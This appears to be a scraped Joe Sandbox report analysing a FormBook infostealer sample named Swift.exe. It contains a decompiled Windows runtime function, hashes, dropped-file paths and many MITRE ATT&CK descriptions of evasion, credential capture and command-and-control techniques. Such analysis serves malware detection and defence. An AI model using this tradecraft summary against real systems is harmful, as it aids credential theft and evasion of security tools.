Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dfcf40e873c1f1d11664cc0fa9c272982984cbda23c9177738e2805d9b58046a
Instruction ID: f90dca90662a5f08c053db43af0c947f5ecdba18274e27effa8d5d193dff203e
Opcode Fuzzy Hash: dfcf40e873c1f1d11664cc0fa9c272982984cbda23c9177738e2805d9b58046a
Instruction Fuzzy Hash: 2CB09BB1D414C5C5F711D7614708B1B790177D1745F26C066D2421681A4778D092F5F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0500FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0500FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04FBCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05005720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05005720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0500fdda
0x0500fde2
0x0500fde5
0x0500fdec
0x0500fdfa
0x0500fdff
0x0500fe0a
0x0500fe0f
0x0500fe17
0x0500fe1e
0x0500fe19
0x0500fe19
0x0500fe19
0x0500fe20
0x0500fe21
0x0500fe22
0x0500fe25
0x0500fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0500FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0500FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0500FE2B

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 69b0662149969231425d174161047bb8dedc7fbb626bf44a6b10493eef4478eb
Instruction ID: d28650836f7cbf38a00c3d802b614351c7778bb2c9f6a488e497e002aaff3e52
Opcode Fuzzy Hash: 69b0662149969231425d174161047bb8dedc7fbb626bf44a6b10493eef4478eb
Instruction Fuzzy Hash: 52F0F632200241BFE6201A45EC06F77BB6AEB44730F151314F628561D1DA62F8209AF0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Swift.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aznhzp.mba

C:\Users\user\AppData\Local\Temp\idxgunu.exe

C:\Users\user\AppData\Local\Temp\jdgedcev.bx

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
Swift.exe

Function 004030F1 Relevance: 82.6, APIs: 26, Strings: 21, Instructions: 313
stringfilecomCOMMON

Function 004054AA Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Function 00405E80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Function 004035D8 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402C38 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Function 00402E71 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171
fileCOMMON

Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147
stringtimeCOMMON

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 00405EA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
libraryCOMMON

Function 0040588B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre